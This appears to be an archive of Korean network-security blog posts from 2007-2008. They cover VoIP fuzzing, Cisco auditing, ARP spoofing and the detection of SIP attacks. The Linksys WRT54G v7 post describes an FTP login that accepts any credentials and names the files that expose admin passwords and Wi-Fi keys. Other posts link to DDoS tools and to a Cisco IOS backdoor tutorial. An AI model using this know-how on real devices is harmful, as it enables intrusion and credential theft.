- Terron Williams for providing extensive, detailed and invaluable feedback during the beta
testing as well as being a source of encouragement
- Ian S. for helping debug several crashes cause by VoIPER
- Pedram Amini and Aaron Portnoy for their work on the Sulley Fuzzing Framework
- Various people on the SmashTheStack and OverTheWire networks that helped in testing

Feedback, suggestions, requests, comments and critisism are all more than welcome and can be sent
to nnp[at symbol]unprotectedhex.com

-nnp
7 October 2008
http://www.unprotectedhex.com

'ⓒ Network' 카테고리의 다른 글

WPA가 크랙되었다!  (0) 2008.11.10
VoIP 공격 증가  (0) 2008.11.06
voiper - VOIP 보안 취약점 점검 도구  (0) 2008.10.31
Cisco 장비 취약점 진단 도구, Nipper  (0) 2008.05.23
Linksys WRT54G v7 FTPd vulnerability  (1) 2008.01.24
사이버공격 근원지 역추적기술  (0) 2008.01.08
Trackbacks 0 : Comments 0

Write a comment


Cisco 장비 취약점 진단 도구, Nipper

ⓒ Network 2008.05.23 09:26

많이 사용하는 만큼 특정제품에 대한 해킹 및 보안 도구가 많이 나오는 것 같네요.

cisco 점검 도구 니퍼...퍼왔습니다...ㅎㅎ

출처 : http://swbae.egloos.com/1756486

말그대로 '니뻐' . 현장에선 흔히 '닛빠' 라고 부름.

소개글 : http://www.zdnetasia.com/insight/network/0,39044847,62035512,00.htm
예제 보고서 : http://i.i.com.com/cnwk.1d/i/tr/downloads/home/Cisco0823.html
홈페이지 : http://nipper.titania.co.uk/

Trackbacks 0 : Comments 0

Write a comment


Linksys WRT54G v7 FTPd vulnerability

ⓒ Network 2008.01.24 00:30

출처 : 헐랭이와 IT보안(http://swbae.egloos.com)

Linksys WRT54G v7 FTPd auth vulnerability(http://swbae.egloos.com/1701135)

Linksys WRT54G 시리즈는 Linux 기반의 임베디드 OS 를 사용하고, 소스를 공개해서 DD-WRT, OpenWRT, HyperWRT 등 다양한 해킹 펌웨어가 등장하는 등 꾸준한 사랑을 받는 환경이 되었습니다. 그 인기로 인해 v1 이후 최근의 v8 까지 꾸준히 업그레이드 되어 오면서, GS, GL 등 다양한 형제 플랫폼이 등장하기도 했죠.

그러나 Linksys내부에서는 해킹 펌웨어에 대해 좋지 않게 생각하는 움직임이 있었는지, v5 버전부터는 플래쉬 메모리와 램 사이즈를 절반으로 줄이고, OS 도 VxWorks 로 전환하였습니다.

심지어 WRT54G v7 은 이전의 Broadcom 칩셋에서 Atheros 칩셋으로 바꾸어 극도로 제한된 환경이 되었죠. 물론 v8 에서는 다시 Broadcom 칩셋으로 돌아갔습니다만...

그러나 펌웨어 해킹이 어려워진 WRT54G v7 에도 몇 가지 취약점이 있는 듯 한데요... 오늘은FTP 인증 문제를 소개시켜드리겠습니다. WRT54G v7 의 디폴트 펌웨어 버전은 v7.00.1 입니다.

이 버전은 21번FTP 포트가 디폴트로 열려있고, 놀랍게도 해당 FTP서버에 아무 아이디나 패스워드를 집어넣어도 접속할 수 있습니다. 직접 접속한 화면을 보여드리면...


FTP 서버에 ID:asdf, PW:asdf 라는 아무 값이나 집어넣어도 WRT54G v7 에 성공적으로 접속한 것을 보실 수 있습니다.
이제해당 디렉터리에 존재하는파일을 제한없이 전부 다운로드 받을 수 있습니다.

그리고 해당 파일들 내에는 서버의 주요 설정 정보와, WEP 키, WPA-PSK 를 위한 암호, WRT54G v7 의 관리자 암호 등이 평문으로 기록되어 있습니다.

예를 들어보면 igwhtm.dat 는 internet gateway htm data 의 약자인 듯 한데, 당연히 웹 기반 관리자 페이지의 HTML 파일들에 대한 정보가 기록되어 있고, 이 중에는 매뉴얼에도 안나오고, 관리자 페이지에서도 볼 수 없었던 숨겨진 페이지들이 있습니다.

위와 같은 명령어를 통해 확인한 정보 중 sysinfo.htm 페이지에 접속해보면 아래와 같이 해당 시스템에 대한 상세 정보를 제공합니다.

이런 페이지도 있죠.

놀랍게도 lastpassword.htm 이라는 파일에는 제 실제 관리자 패스워드를 기록하고 있었습니다.

wlaninfo.htm 은 무선랜 관련 상세 설정과 함께 WPA_PSK 키가 평문으로 들어있네요.

Linksys 의 공식 HTML 페이지들은 이름이 전부 대문자로 시작하는 반면, 시스템 설정 정보를 살펴보기 위한 일종의 백도어(?) 페이지들은 전부 소문자로 이름이 시작하는 것을 알 수 있습니다.

igwpricf.dat 이라는 파일 역시 해당 시스템에 대한 상세한 설정 정보와 관리자 ID, 패스워드, WPA-PSK 키, WEP 키 등을 평문으로 기록하고 있습니다.

nvram.cfg 라는 파일은 그 이름대로 Linksys 라우터의 설정 파일인데, 역시 해당 시스템에 대한 상세한 설정 정보와 관리자 ID, 패스워드, WPA-PSK 키, WEP 키 등을 평문으로 기록하고 있습니다.

Linksys WRT54G v7 AP사용자는 누구나FTP 로 접속하여 중요한 정보가 저장되어 있는 위의 파일들을 다운로드 받을 수 있습니다.

또한 FTP 사용자는 /mem/pricf/0 라는 파일을 다운로드 받을 수 있습니다. 이 파일은 Linux 의 /proc 파일 시스템과 같이 메모리 상의 정보를 파일 시스템 형태로 액세스할 수 있는 파일인데, nvram.cfg 와 마찬가지로 시스템에 대한 다양한 정보를 담고 있습니다.

제가 가진 시스템이 v7 이라 v7 에서만 확인한 것일 뿐, 다른 버전에서는 해당 문제를 아직 확인해보지 않았습니다. v8 에도 같은 문제가 있는지는 다른 분들이 확인해주시면 좋겠네요.

Linksys WRT54G v7 FTPd DoS vulnerability(http://swbae.egloos.com/1701223)

Linksys WRT54G v7은 VxWorks 5.4.2 를 사용 중인데,이 버전의 알려진 취약점이 패치되어 있지 않다.

취약점 정보 : http://www.securityfocus.com/bid/6297

해당 공격을 수행하게 되면 AP 가 죽는다.

전형적인 버퍼오버플로우 공격 취약점.

여기서 나오는 VxWork가 모냐하면!!

VxWorks는 미국의 윈드리버 시스템사가 만들어 판매하는 실시간 운영체제(RTOS)이다. 이와 유사한 실시간 운영체제로는 QNX, LynxOS, VRTX, pSOS, Nucleus, RTX, OSE, Velos 등이 있다.

VxWorks는 선점형 스케줄러 기반의 빠른 멀티태스킹 커널로 빠른 인터럽트 반응과 확장된 태스크간 통신/동기화 기능을 지원하며, UNIX 모델과 호환되는 효율적인 메모리 관리 방식을 따르며, 멀티 프로세서를 지원한다. 또한 VxWorks는 사용자 인터페이스를 위한 셸을 지원하며, 심볼릭 또는 소스레벨 디버깅 기능과, 성능 모니터와 I/O 파일 시스템을 제공한다.

화성 탐사선 스피리트 호와 오퍼튜니티 호는 PowerPC 플랫폼에 VxWorks 운영체제를 탑제하였다. 이외에도 몇 기의 우주선의 운영체제로 사용되었고, 보잉사도 새로운 상업 항공기 기종인 7E7의 운영체제로 사용하려고 한다.

출처 : http://ko.wikipedia.org/wiki/VxWorks

Trackbacks 0 : Comments 1
  1. Favicon of http://blog.naver.com/moto99 BlogIcon 이동영 2008.02.02 12:20 신고 Modify/Delete Reply

    신선하거든

Write a comment


사이버공격 근원지 역추적기술

ⓒ Network 2008.01.08 14:00

공격이 들어오면 그 근원지가 어디인지 알아내는게 급선무이죠.

그래야 범인을 잡을 수 있으니까...

또한 중간의 감염 경로를 파악해 피해 확산을 막아야 할 것입니다.

아래 기사는 현재 개발진행되고 있는 기술을 소개하고 있습니다.

기사보기 : http://www.dt.co.kr/contents.html?article_no=2008010402011860713001

Trackbacks 0 : Comments 0

Write a comment


DDOS 공격 툴

ⓒ Network 2008.01.04 19:57

coderant님이 ddos에 관한 툴을 소개 해주셨네요

NetBot Attacker : http://coderant.egloos.com/4055929

RD 2007 : http://coderant.egloos.com/4058930

netbot같은 경우는 국내 아이템 거래 사이트를 마비시켰었던 툴이라고 합니다.

netbot이 제가 hakeroo에서 우연히 보았던 툴이네요.(한국 pc 해킹했다는...)

hackeroo에서 동영상도 제공하나본데 근데 무슨 연유인지는 모르나 전 동영상이 안보여지는군요ㅜㅜ

Trackbacks 0 : Comments 0

Write a comment


[ISCW/Device Hardening/Lab4] AutoSecure

ⓒ Network 2007.12.30 12:42

제목처럼 라우팅 보안설정입니다.

http://blog.naver.com/mongu2/140046225538

중요한 라우터 보안...꼭 잘 설정해서 사용하세요^^

라우터와 같은 장비에 대한 취약점은 버그보다는 잘못된 설정이 많다고 하니까요.

종호님 블로그에 가시면 네트워크에 대한 자료가 풍부합니다. 참고하세요.

저에겐 좀 난이도가 높다는거...ㅜㅜ

Trackbacks 0 : Comments 0

Write a comment


port knocking 네트웍 방화벽

ⓒ Network 2007.12.26 18:20

port knocking 으로 방화벽 구현과 구성방법에 대한 자료입니다.

읽어보시면 port knocking이 먼지도 알게 되실 겁니다.

방화벽 구현

방화벽 구성법

Trackbacks 0 : Comments 0

Write a comment


Teredo 터널링, 보안상의 위협

ⓒ Network 2007.12.14 17:21

출처 : http://swbae.egloos.com/1681792

IPv6 를 지원하기 위한 Teredo 터널링이 기존 네트워크에 보안 상의 위협이 될 수 있음을 알려주는 보고서가 나왔습니다.

http://www.ietf.org/internet-drafts/draft-ietf-v6ops-teredo-security-concerns-01.txt

비단 Teredo 터널링만 아니라, IPv6를 기존의 IPv4 망에 지원하기 위한 방법들이 모두 공통적인 문제를 안고 있다고 봐야 옳겠지요.

Trackbacks 0 : Comments 0

Write a comment


[링크스크랩] 네트워크 보안 솔루션의 종류 및 교육 과정

ⓒ Network 2007.12.11 18:24
Trackbacks 0 : Comments 0

Write a comment


sns 역기능 대비

ⓒ Network 2007.12.07 10:37

기사 보기 : http://www.dt.co.kr/contents.html?article_no=2007120602010351713003U

sns란 social network service라고 하는데요...사회연결망 서비스? 언어능력부족으로...네이버형에게 물어?f더니

'친구, 선후배, 동료 등 지인들과의 관계망을 구축해 주고 이들의 정보 관리를 도와주는 서비스....'

라고 하네요...아하~

키사에서sns에 대한 역기능에 대해 보고서를 발간했습니다...아직 기사만 보았구요...기사가 무지 늦게 떳네요...보고서는 지난달 30일에 올라왔는데..

참고하세요..

-보고서 다운받기-

Trackbacks 0 : Comments 0

Write a comment


ARP스푸핑 공격과 대응

ⓒ Network 2007.12.07 10:26

출처 : http://www.dt.co.kr/contents.html?article_no=2007120602011860713002

ARP스푸핑 공격과 대응
랜카드 주소 위장 개인정보 가로채

홈페이지 해킹 뒤 아이프레임 삽입
감염 사이트 방문자들 동시에 위협
네트워크 관리ㆍ보안패치 설치 필수




홈페이지를 해킹한 뒤 삽입한 아이프레임(iframe)을 통해 악성코드를 감염, 유통시키는 방식의 해킹은 2005년 처음 등장한 이후 계속 증가하고 있습니다. 최근 들어서는 악성코드가 삽입된 홈페이지를 방문하는 사용자들을 감염시키는 외에 한 서버를 해킹해 여러 서버를 해킹한 효과를 주고 악성코드에 감염된 사용자를 통해 동일 네트워크 장비를 공유하는 사용자들에게 동시에 위협을 주는 형태로 나타나고 있습니다.

`ARP스푸핑'은 랜 카드의 고유한 주소(MAC 주소)를 동일 네트워크에 존재하는 다른 PC에 꽂혀있는 랜 카드의 주소로 위장, 다른 PC에 전달돼야 하는 정보를 가로채는 공격을 말합니다. ARP스푸핑은 이미 오래 전부터 알려져 있는 새로운 공격 기법이 아니지만 최근 많이 활용되면서 부각되고 있으며 이를 통해 유포되는 악성코드는 개인 계정정보 유출과 분산서비스거부(DDos) 공격에 악용되고 있습니다.

오늘은 최근 급증하고 있는 ARP스푸핑을 통한 악성코드 유포에 대한 분석과 이같은 유형의 사고를 예방하기 위한 방안은 어떠한 것들이 있는 지 알아보도록 하겠습니다.

◇ARP스푸핑 의한 악성코드 유포=올 들어 발생한 홈페이지 악성코드 은닉 사고 중에는 해당 홈페이지(웹 서버)를 세세하게 분석해도 악성코드가 삽입된 흔적을 발견할 수 없었던 사례가 있었습니다. 대개 해당 홈페이지를 접속하면 악성코드를 다운로드 해 감염시키려는 시도가 탐지되는 것과는 확연히 다른 것이었습니다. 그런데 해당 웹서버가 위치한 네트워크에 접속된 모든 서버들을 점검한 결과, 초기에 해킹을 의심한 서버는 해킹 당하지 않았지만 주변에 있던 다른 서버가 해킹돼 있었습니다. 즉 해킹 당한 호스트(Attacker)에는 ARP스푸핑을 할 수 있는 프로그램이 설치돼 자신을 게이트웨이로 위장하고 웹 서버 접속자가 접속해 웹서버가 응답하면 게이트웨이로 위장된 공격자가 응답해 발생한 웹 문서를 변조해 악성코드를 감염시킨 것입니다.


이는 웹서버가 해킹 당하지 않더라도 해커가 원하는 악성코드 은닉 공격을 할 수 있음을 보여주는 것으로 동일 네트워크에 다른 웹 서버가 연결돼 있다면 그 피해가 커질 수 있음을 의미합니다.

기존 사례처럼 특정 웹 서버를 해킹해 사용자 개인정보를 유출시키는 악성코드를 은닉하고 방문자들에게 악성코드를 감염시키는 방식은 동일하지만 악성코드에 ARP스푸핑 기능을 탑재, 감염된 PC는 동일 네트워크 상의 모든 PC에게 자신이 외부 네트워크와 연동되는 게이트웨이라고 속여 모든 인터넷 트래픽을 가로채고, 패킷을 변조하는 방식도 나타나고 있습니다. 특히 아파트처럼 많은 사용자가 동일한 네트워크 장비(스위치)를 공유하는 광랜 형태로 네트워크가 구성돼 있을 경우, 같은 장비를 공유하는 모든 사용자들의 웹 서핑 정보에 악성코드를 감염시킬 수 있는 코드를 삽입시킬 수 있어 피해가 커질 수 있습니다.

◇서버 및 네트워크 관리와 실시간 보안 패치 필수=ARP 스푸핑에 의한 공격은 해당 네트워크에 연결된 웹서버들이 직접적인 해킹을 당하지 않았어도 이 웹 서버들을 방문하는 모든 취약한 사용자들이 악성코드에 감염되는 피해를 입게 된다는 점에서 이전의 방법과 확연히 다른 양상입니다. 또 향후 공격 방식이 계속 다양한 방식으로 진화할 것으로 보여 이에 대한 철저한 대응이 필요합니다.

ARP스푸핑 공격으로 인한 피해를 방지하기 위해서는 서버 및 네트워크 관리자는 공격에 취약한 사용자의 PC들은 웹 서버들이 연동되는 네트워크에 연동되지 않도록 관리하는 한편 웹 서버들의 응용 프로그램들을 통한 해킹 가능성 등을 상시 체크해 안전한 상태로 유지해야 합니다.

일반 사용자들은 ARP스푸핑을 통한 악성코드 유포의 주 공격 타깃이 보안 패치가 설치되지 않은 PC라는 점을 감안, 보안 패치를 실시간으로 업데이트하는 것이 필수적입니다. 또 바이러스 백신을 사용, 이러한 공격에 의해 악성코드에 감염되어 있는지를 확인하는 등 전체적인 점검을 해야합니다.

<자료:KISA>

Trackbacks 0 : Comments 0

Write a comment


VoIP 공격 탐지기술

ⓒ Network 2007.12.06 12:09

출처 : http://blog.daum.net/bobodong/5579521

VoIP 공격 탐지기술

Voice over IP(이하 VoIP)는 저렴한 요금과 국제 전화의 용이성 등으로 인하여 그 사용률이 급증하고 있다. 이 VoIP에서 전화 연결을 맺을 때 사용하는 Session Initiation Protocol(이하 SIP)에서 일어날 수 있는 위협을 논하고 그에 대한 탐지 방법을 알아본다.


요즘 들어 050, 030, 070으로 시작하는 전화를 받아보지 못한 사람은 거의 없을 것이다. 위의 국번들은 모두 VoIP 서비스 사업자들이 사용하는 번호로서 정부 및 여러 가지 서비스 업체들이 주로 사용한다.


이런 국내 VoIP 서비스 시장은 2009년까지 연평균 성장률 54%를 기록해 2009년에는 9689억원 규모를 형성할 것으로 전망된다. 이런 추세는 전 세계적으로도 비슷해서 2008년에는 VoIP 서비스 사용자들이 약 2억명이 될 것으로 예상했다.


또한 VoIP 서비스는 전화뿐만 아니라 원격 화상 회의, 인스턴트 메시지, SMS 등의 기술들과 결합하고 기존의 인터넷망을 이용함으로써 국내 전화는 물론 국제 전화까지도 무료 혹은 아주 저렴한 가격에 제공함으로써 진화를 거듭하고 있다. 그런데 이것은 다른 관점에서는 VoIP 서비스가 앞으로 여러 보안 문제에 직면하게 된다는 것과 다름이 아니다.


사실 VoIP 소프트웨어의 취약성을 점검해주는 툴들이 몇몇 있기는 하지만 이들 대부분은 단순히 여러 예상되는 취약성들을 나열하여 보고서 형식으로 보여 주는 것이 그친다. 이러한 취약성들로부터 안정적인 VoIP 서비스를 위해서는 현재의 서비스를 방해하지 않으면서도 특정 위험 요소들을 탐지할 수 있는 VoIP 서비스 디자인이 필수적이라고 할 수 있다.


본문에서는 VoIP 중에서 SIP를 이용한 서비스의 이해를 도울 수 있는 배경 지식과 일어날 수 있는 위협들을 알아보고 이 위협에 어떻게 대처할 수 있는가에 대해 알아보도록 하겠다.


SIP-VoIP 배경지식


우선 VoIP 서비스라고 앞에서 언급하다가 SIP를 이용한 VoIP 서비스에 초점을 맞춘다고 했는데 도대체 SIP가 무엇이고 어떤 역할을 하는지 궁금할 수도 있을 것이다. 이에 대해 간단히 설명을 하면, 우선 VoIP 서비스는 쌍방간의 접속을 통한 미디어 서비스인 만큼 연결을 맺기 위한 규약(프로토콜)이 필요하다.


바로 이 연결 프로토콜중의 한 표준이 Session Initiation Protocol, 즉 SIP인 것이다. 다른 대표적인 VoIP 연결 프로토콜로는 H.323이 있다. SIP는 H.323보다 연결을 맺는 과정이 간단하고 HTTP처럼 패킷의 헤더정보가 일반 텍스트로 되어있어서 쉽게 인터넷 환경에 적용을 할 수 있다는 이점이 있다.

또한 H.323보다 연결 부하가 적다는 점 때문에 많은 기능들을 제공해야하는 현재의 VoIP 사업자들에게는 SIP가 매력적인 프로토콜로 자리매김을 하고 있다. 두 프로토콜에 대한 자세한 비교와 정보는 Packetizer라는 사이트의 VoIP웹페이지에서 에서 얻을 수 있다.


그러면 앞에서 설명한 연결 프로토콜은 SIP를 사용한다고 했을 때, 연결 후에 사람의 음성을 전달 할 프로토콜도 필요할 것이다. 그것이 바로 Real-time Transport Protocol(RTP)이다. SIP는 연결의 맺고 끊음을 담당하는 반면에 RTP는 멀티미디어 데이터(음성, 영상등)의 전송을 담당하는 프로토콜이다. 이해를 돕기 위해 SIP-VoIP 서비스에서 전화의 연결과정에 대해 간략하게 살펴보기로 하자.


그림1에서 보면 UAC(User Agent Client)가 UAS(User Agent Server)에게 전화를 요청(INVITE)한다. UAS가 INVITE 메시지를 받게 되면 Ringing 메세지를 전송함으로써 INVITE 메시지의 수신을 알린다. 후에 UAS가 전화 요청을 수락하면 OK 메시지를 UAC에게 전송하고 서로 간에 ACK를 주고받음으로써 세션 연결은 성립이 된다.


그 후에는 RTP가 미디어 스트림의 전송을 도맡아서 처리하게 되고 어느 한 쪽이 BYE 메시지를 전송하게 되면 세션 연결은 종료된다. 어떻게 생각하면 당연하고 간단한 일들을 SIP와 RTP라는 두 규약에 따라서 왠지 복잡하게(?) 처리하는 것 같기도 하다. 하지만 이것이 끝이 아니다. 오늘의 요점인 SIP 메시지의 내부를 한 번 들여다보면 더욱 복잡하다는 것을 알 수 있다.


SIP의 여러 메시지 중 INVITE 메시지의 내용을 보면 메시지 헤더 부분에는 누가 누구에게 어떤 메시지 종류(여기서는 INVITE)를 보내고자 하는지, 메시지 바디부분에는 RTP로 미디어 스트림 전송 시에 오디오 코덱의 종류와 사용할 포트 정보가 있다.


이에 대한 자세한 정보는 RFC 3261과 RFC 2237 문서에 정리되어 있다. 여기서 한 가지 주목할 만 한 점은 TCP/IP 등 다른 네트워크 프로토콜들과는 다르게 메시지의 헤더와 바디가 일반 문자로 되어있다는 것이다. 이것은 서비스의 구현에 편리하게 작용할 수도 있지만 보안상으로는 취약할 수도 있다.


위협 모델


SIP-VoIP 서비스에서는 어떠한 위협들이 있을 수 있는지 알아보자. 사실 VoIP 서비스는 앞에서 말한 것처럼 SIP와 RTP가 서로 역할을 나누어 맡고 있기 때문에 그 위협 또한 SIP 기반 위협, RTP 기반 위협 두 가지로 나누어 볼 수 있다. 본문에서는 SIP 기반 위협들을 다루기로 하고 RTP 위협들에 대한 것들은 간단히 언급만 하기로 한다.


① SIP 기반 위협

우선 SIP 기반 위협들은 크게 비정상 메시지 공격(Malformed message attack), SIP 플러딩 공격(SIP flooding attack), 스푸핑 공격(Spoofing attack), 이렇게 세 가지로 나누어 볼 수 있다.

ㆍ비정상 메시지 공격 : SIP의 헤더와 바디 내용이 일반 문자로 되어있다는 점을 이용하여 다른 문자들로 삽입, 변조 혹은 삭제하는 것이다. 예를 들면 엄청난 수의 공백 문자를 넣어 오버플로우 예외를 발생시킨다거나 특수문자(한자어나 non-ASCII)를 넣어 이에 대응하지 못하는 VoIP 서비스의 오동작을 유발할 수 있다.

ㆍSIP 플러딩 공격 : SIP 메시지를 대량으로 보내어 VoIP 사용자나 사업자가 정상적인 서비스를 이용 혹은 제공하지 못하게 하는 것으로, 일반 네트워크에서 DoS(Denial of Service)와 비슷한 개념이라고 볼 수 있다. 하지만 연결 요청, 즉 INVITE 메시지 플러딩인 경우 수신자의 전화기가 불통이 될 뿐만 아니라 전화 벨이 계속 울리는 등 아주 난처한 상황을 유발 할 수도 있기 때문에 그 심각성이 높다.

ㆍ스푸핑 공격 : 발신자의 IP나 URI(Uniform Resource Identifiers, VoIP 서비스에서는 ID와 같은 개념)를 변조하여 공격자의 신분을 숨기거나 변조하는 것을 말한다. 사실 이 위협은 IP를 사용하는 모든 서비스에서 겪는 것이므로 다른 여러 논문에서 그 대응 방안들을 언급하고 있다. SIP-VoIP에서의 위협과 대처법에 초점을 맞추기로 한 본 문의 범주에는 벗어나므로 다루지 않기로 하겠다.


② RTP 기반 위협

ㆍRTP 플러딩 공격 : 미디어 스트림을 대량으로 수신자에게 전송시켜 정상적인 서비스 이용을 방해한다.

ㆍVoIP Spam : SPIT(Spam over Internet Telephony)으로 알려진 VoIP Spam 공격은 요즘들어 빠르게 확산되고 있다. 상업적인 목적으로 자동화 시스템을 이용하여 불특정 다수에게 다량의 전화 연결을 시도하는 것이다.

ㆍMITM(Man-In-The-Middle) : 공격자가 송신자와 수신자의 중간에 위치하여 도청, 감청등을 행한다.


SIP-VoIP 위협 탐지 방법


앞에서 나열한 위협들 중에서 SIP 기반 위협에는 크게 세 가지가 있고 그 중 본문에서 초점을 맞출 비정상 메시지 공격과 SIP 플러딩 공격에는 어떠한 대처법이 있을 수 있는지 알아보자.


우선 위의 두 가지 공격에 대해 탐지할 수 있는 메카니즘의 모듈들과 순서는 각 호스트에서 SIP 패킷이 송수신될 때마다 비정상 메시지인지 판별이후 정상적인 SIP 형태를 갖춘 패킷들만을 분석하여 그 SIP 패킷이 어떤 세션 소속인지를 판단한다. 그 후에는 해당 세션에 과도한 메시지의 송수신이 있었는지 판단하여 해당 SIP 패킷을 통과 시킬 것인지 차단할 것인지를 결정하게 된다. 각 모듈에 대한 설명은 아래와 같다.


① Malformed SIP detection module

ㆍ해당 SIP 패킷이 올바른 형태를 갖추고 있는지 룰 매칭 엔진에서 검사를 하게 된다. 룰 매칭 엔진은 정규 표현식을 이용하여 해당 패킷을 정해진 규칙과 비교 검사한다.


② Session management module

ㆍ해당 SIP 패킷을 분석하여 어느 세션에 속한 패킷인지를 판단한다. IP 주소, URI, 포트번호등으로 판단하며 처음 송수신되는 SIP 패킷이라면 새 세션을 만들게 된다.


③ SIP flooding detection module

ㆍ해당 SIP 패킷이 속한 세션에서 과도한 SIP 메시지 송수신이 있는지를 State transition model과 상한 기준선(Threshold)을 사용하여 판단한다.


④ Error management module

ㆍ해당 SIP 패킷의 검사 결과를 토대로 패킷의 통과, 사용자에게 경고, 패킷의 차단 중 어떤 것을 실행할 것인지 판단한다.


사실 위의 4가지 모듈중에서 ②와 ④는 ①과 ③의 원활한 작동을 위한 부가적인 모듈이다. 따라서 본 메카니즘의 탐지 핵심 모듈이라 할 수 있는 ①과 ③의 설명을 자세히 하도록 하겠다.


Malformed SIP Detection Module


비정상 메시지인지 여부를 판단하는 이 모듈에서 가장 중요한 아이디어는 RFC 3261에서 규정한 250여 가지가 넘는 ABNF(Augument Backus-Naur Form)규칙들을 컴퓨터 언어에 적용할 수 있도록 정규 표현식으로 바꾸는 것이다.


예를 들면 RFC 3261의 SIP 규칙 중에 port=1*DIGIT이라는 것이 있다. 이 의미는 포크는 한 자리 이상의 숫자로 이루어져야 한다는 것이다. 이것을 정규 표현식으로 바꾸면 port=/d+ 가된다.


당연한 이야기 일지 모르지만 이러한 규칙들이 여러 개 합쳐져서 하나의 혹은 여러 개의 SIP 메시지들의 형태를 잡아주게 되는 것이다. 하지만 이 규칙에도 오류가 있다는 것을 이미 발견한 사람도 있을 것이다. 그것은 바로 포트 번호는 0~65535의 범위 내에서 존재한다는 것이다. 그래서 포트 규칙을 보다 안정성 있게 바꾼 식은 port=/d{1,5}이다.


포트번호는 숫자이면서 1~5자리 이내의 수여야 된다는 것이다. 물론 이 식도 99999와 같은 예외 가능성도 있기 때문에 완벽한 것은 아니다. 하지만 숫자이기만 하면 무조건 가능한(심지어는 음수까지도) 원래의 RFC 규칙에 비한다면 훨씬 안전하다고 말할 수 있다.


표 1은 RFC 3261의 여러 규칙들을 위와 같은 아이디어를 적용하여 보안성 있는 정규 표현식으로 바꾸어 본 것들이다. 해당 규칙에 대한 원래 식들은 RFC 3261에 기술되어있다.


SIP Flooding Detection Module


과도한 SIP 메시지 송수신이 있는지를 검사하기 위해서는 보통 허용 상한선(Threshold)를 두고 그 선을 초과했는지 여부를 보고 판단하게 된다. 하지만 SIP에서는 여러 종류의 메시지가 있고 이 종류에 따라서 플러딩 검사를 하는 것이 효율적이 되는데 이를 이용하기 위해 RFC 3261에 있는 State transition model을 사용했다.


이러한 State transition model은 INVITE 메시지 송신 경우, INVITE 메시지 수신 경우, Non-INVITE 메시지 송신 경우, Non-INVITE 메시지 수신 경우의 네 가지로 나누어 지는데 본문에서는 첫 번째 경우만 소개했다. 나머지 경우에 대한 State transition model은 RFC 3261에 자세히 기술되어 있다.


실험 및 관련 연구


비정상 메시지 탐지 실험을 하기 위해 인터넷의 공개 자료인 PROTOS test-suite:c07-sip를 사용했다. 이 테스트 자료는 SIP와 SDP 비정상 메시지를 4,527개 정도를 담고 있으며 실험에서는 그중 SIP 비정상 메시지인 2,426개를 실험 자료로 사용했다.


전체 비정상 메시지 탐지 개수를 원래 RFC 규칙과 Secure 규칙을 비교해 본 결과 Secure 규칙을 적용한 것이 원래 RFC 규칙보다 더욱 좋은 탐지율을 보인다는 것을 알 수 있었다.


SIP 플러딩 공격을 재연하기 위해서 직접 SIP 패킷을 발생시키는 툴을 제작, 사용했고 공개 소프트웨어인 SiVuS를 사용했다.

SIP 패킷 전송 속도, 즉 pps(packet per second)를 다르게 했을 때 각각 몇 초 뒤에 플러딩 공격을 탐지하는지에 대한 허용 상한선은 8로 하였는데 이것은 State transition model의 시작서부터 끝까지 최대 8개의 SIP 메시지를 허용한다는 뜻이다.


이 8이라는 수치는 그동안의 정상적인 VoIP 서비스를 모니터링 한 통계를 토대로 허용 상한선을 책정하게 되며 이 상한선은 네트워크의 상태에 따라 동적으로 변하도록 했다. 1pps의 경우에는 전송속도가 매우 느리기 때문에 플러딩 공격으로 간주할 수 없고 그 다음으로 느린 3pps의 경우 약 2.4초 후에는 탐지되는 것을 알 수 있다.


사실 3pps도 플러딩 공격으로 간주하기에는 그 속도가 느리다고 할 수 있지만 이 경우에도 2.4초 후에 탐지된 다는 것은 VoIP 서비스를 제공하기에 무리가 없음을 의미한다.


이와 관련 연구로는 우선 Intrusion Detection System(IDS, 침입 탐지 시스템)이라는 것이 있는데 이것의 대표적인 예로는 Snort라는 아주 유명한 공개 IDS가 있다. Snort는 일반 네트워크 침입 탐지 시스템으로서 6,000여개가 넘는 룰을 제공하는 무료 소프트웨어이다. 하지만 Snort는 VoIP에 특화된 룰을 아직 제공하지는 않을 뿐더러, 패킷 기반의 탐지여서 세션 단위로 탐지가 이루어져야하는 VoIP 서비스에는 바로 적용하기에는 무리가 있다.


비정상 메시지를 탐지하는 기존 연구도 물론 있어왔다. 대표적으로 D. Geneiatakis 등의 연구가 있는데 이 연구에서는 SIP 메시지의 공통점을 토대로 특정 SIP 메시지가 꼭 포함해야할 것, 패킷 길이의 제한등의 SIP 메시지 포맷의 큰 틀을 제안했다. E. Chen등의 연구에서는 본 연구에서 제안한 것처럼 RFC 3261의 State transition model을 사용하여 플러딩 공격을 탐지하는 방법을 선보였다.


위의 두 연구는 각각의 VoIP 위협을 탐지할 수 있지만 본 연구는 두 개의 위협을 동시에 탐지할 수 있는 방법을 제시했으며 실제적인 사용을 위해 기존 RFC 규칙을 강화하고 정규 표현식을 도입하였으며 플러딩 탐지시 네트워크 상황을 반영한 동적 상한선을 두었다는 점에서 차이가 있다.


네트워크 종단점과 중간의 SIP Proxy에 적용


이 글에서는 요즘 높아진 인터넷 보급률을 바탕으로 그 입지를 넓혀가고 있는 VoIP 서비스 중, 앞으로 대부분의 VoIP 서비스에서 사용하게 될 SIP의 취약성과 그 탐지에 대해 알아보았다.


탐지를 하기 위해서 크게 네 개의 모듈로 구성된 메카니즘을 제안했고 이 중 비정상 메시지 탐지는 정규 표현식을 이용, SIP 플러딩 탐지는 State transition model을 사용한다는 것이 핵심적인 내용이었다.


실험 결과 비정상 메시지 탐지는 원래 RFC 규칙 보다 제안한 Secure 규칙이 26% 높은 탐지율을 보였으며 플러딩 공격도 최대 2.4초 안에 탐지함으로써 기존 VoIP 서비스에 방해가 되지 않음을 보였다. 기본적으로 실험은 호스트에서 행해졌지만 이것은 실험 결과 도출의 용이함을 위한 것이었고 본 메카니즘은 네트워크의 종단점뿐만 아니라 중간의 SIP Proxy등에도 적용되어 VoIP 서비스를 좀 더 강건하게 만들어 줄 수 있을 것이다.

Trackbacks 0 : Comments 0

Write a comment


TCL 로 Cisco 라우터에 백도어 심기

ⓒ Network 2007.11.28 21:14

출처 : http://swbae.egloos.com/1674111

TCL 로 Cisco 라우터에 백도어 심기

Cisco 에 TCL 광신도가 있다는 건 이미 익히 알려진 사실이죠(Sun 에도 일부 있는 듯...)
덕택에 Cisco IOS 는 TCL 을 지원하고 있는데요, 이 기능을 활용해 백도어를 심는 방법에 대한 Step-by-Step 강좌가 나왔습니다.

http://packetstormsecurity.org/papers/bypass/Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf

